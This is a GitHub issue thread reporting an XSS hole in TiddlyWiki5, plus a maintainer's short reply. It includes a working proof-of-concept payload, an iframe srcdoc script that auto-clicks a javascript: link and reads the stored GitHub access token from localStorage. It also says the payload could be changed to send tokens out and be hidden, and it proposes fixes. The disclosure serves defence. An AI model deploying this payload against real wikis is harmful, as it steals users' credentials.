### ISSUE TITLE
[BUG] Potential XSS Vulnerability

### ISSUE THREAD

**Issue by flancast90** [Jermolene/TiddlyWiki5#5958]
Hello,

As discussed in [this GoogleGroups post](https://groups.google.com/g/tiddlywiki/c/BVokrn0VQa8), JavaScript code can be embedded into a Tiddler via an iframe bypass. While the HTML5 ``iframe`` is naturally sandboxed, JS within it can still run. This leads to the vulnerability I uncovered with this code:

``` js
<$vars vSrcDoc={{{ [[<body> <div id="clockDiv"></div><script>document.getElementById('clockDiv').innerHTML = `<a id="xss" href="javascript:alert('Your GitHub Token is:'+localStorage.getItem('tw5-password-github')+'. If it is blank, you probably don\\'t have TW GitHub saving configured');"></a>`; document.getElementById('xss').click();</script></body>]] }}}>
<iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe>
</$vars>
```

What it does (as most of you can probably tell), is grab the localStorage attribute where the GitHub PAT is saved by TW, and alerts it back to the user. This code could easily be modified to email harvested PAT's back, and use CSS to hide the function/link that calls it. 

I believe this represents a weakness in the iframe approach, and needs to be modified. For one, I could see adding an HTML5 sandbox attribute to the TW core (https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#attr-sandbox), where it listens for tiddler changes, and if the tiddler text contains an iframe, it auto-adds the sandbox to it. 

Another way to fix this without scrapping the iframe/replace iframe code, is to re-imagine the way TW stores the github PAT. A method of storing using cookies would be better, I believe, since it would be beyond the scope of what an iframe could access.

**Comment by saqimtiaz** [comment]
See #5955. Recommend reading and adding any further comments there, and closing this issue.
